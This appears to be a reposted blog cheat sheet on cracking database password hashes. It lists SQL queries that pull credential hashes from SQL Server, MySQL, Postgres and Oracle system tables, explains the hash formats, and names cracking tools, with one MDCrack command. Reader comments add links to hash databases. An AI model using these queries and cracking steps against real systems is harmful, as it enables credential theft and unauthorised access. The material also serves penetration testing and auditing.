Database Password Hashes Cracking

信息来源:WEB安全手册
作者:sid

SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name=’sa’
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash

SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name=’sa’
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo’s comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql  < 4.1

mysql> SELECT PASSWORD(‘mypass’);
+——————–+
| PASSWORD(‘mypass’) |
+——————–+
| 6f8c114b58f2ce9e   |
+——————–+

*mysql >=4.1

mysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
| PASSWORD(‘mypass’)                        |
+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+

Select user, password from mysql.user
The hashes can be cracked in ‘cain and abel’

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
select usename, passwd from pg_shadow;
usename      |  passwd
——————+————————————-
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….

References/Copied from:-
http://hkashfi.blogspot.com/2007/08/breaking-sql-server-2005-hashes.html
http://dev.mysql.com/doc/refman/5.0/en/password-hashing.html
http://pentestmonkey.net/blog/cracking-postgres-hashes/
http://freeworld.thc.org/thc-orakelcrackert11g/

——————-我是分割线(# 鬼仔:以下内容摘自WEB安全手册相关评论)——————

Tr4c3
MySQL 64bit Hash Database
http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=5761

robert:
oracle
The hashes can be cracked checkpwd or orabrute

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

发表评论